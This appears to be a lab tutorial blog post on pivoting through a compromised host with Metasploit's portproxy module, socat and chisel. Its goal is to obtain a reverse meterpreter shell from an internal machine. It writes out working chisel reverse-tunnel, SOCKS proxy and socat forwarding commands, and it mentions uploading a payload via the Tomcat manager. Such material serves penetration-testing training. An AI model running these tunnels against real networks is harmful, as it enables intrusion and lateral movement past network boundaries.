Metasploit: Portproxy(tunneling meterpreter session inside another meterpreter session)+socat+chisel
Hi readers, here we will see how we can get reverse meterpreter shell from a internal machine(which is not connected to internet). For more understanding this article can be followed after reading previous article(https://pswalia2u.medium.com/pivoting-metasploit-proxychains-85d18ce5bf2d)
Prerequisites:
Already compromised system(Pivot) with meterpreter session with already autoroute configured for next machine(10.100.11.100).
Network architecture:
- Setting up portproxy module:
2. Exploiting a vulnerability and configuring the exploit module
Here we have exploited apache tomcat server(uploaded payload via tomacat manager) running on port 8443 on our target(10.100.11.100).
3. Networking info for better understanding:
a. Attacker:
b. Pivot Machine:
c. Target:
Note: portproxy module is only for windows pivot machines. For unix/linux I prefer socat for forwarding tcp traffic to specific IP.(socat must be installed on pivot for this to work)
socat TCP-LISTEN:8888,fork TCP:172.16.40.9:8889
Here Any tcp traffic we get on 0.0.0.0:8888 will be forwarded to 172.16.40.9 on port 8889.
Similar thing we can do using chisel(need to transfer chisel binary):
CHISEL(https://github.com/jpillora/chisel):
Port forwarding-
- On local attacker’s kali box(10.10.14.23) we start chisel server listening on port 8888.
./chisel server -p 8888 --reverse
2. On machine where we need to do forwarding(172.17.0.6) we start chisel client specifying server(10.10.14.23:8888) and remote machine(172.17.0.4:3000) details where we we need to forward traffic.
./chisel client 10.10.14.23:8888 R:3000:172.17.0.4:3000
On server side we can check chisel server started listening on port 127.0.0.1:3000.
Our tunnel has been setup successfully. Now any traffic sent to 127.0.0.1:3000 from 10.10.14.23 will be forwarded to 172.17.0.4:3000
SOCKS Proxy-
- Start chisel server on kali box:
chisel server -p 1433 --reverse
2. Start chisel client on pivot box:
./chisel64 client 192.168.119.156:1433 R:socks
3. Check Socks server created on kali box -
Lab details:
INE LAB 19 (Leveraging PowerShell During Exploitation)
Exposing LDAP via chsiel:
chisel server -p 8001 --reverse
./chisel64 client 10.10.14.35:8001 R:389:127.0.0.1:389
Exposing RPC port 111, UDP port forwarding socat:
Server side:
socat tcp4-listen:5353,reuseaddr,fork UDP:10.254.100.58:111
Client side:
socat udp4-listen:111,reuseaddr,fork tcp:9.42.116.123:5353
Thanks for reading!
Author: Prabhsimran (https://www.linkedin.com/in/pswalia2u/)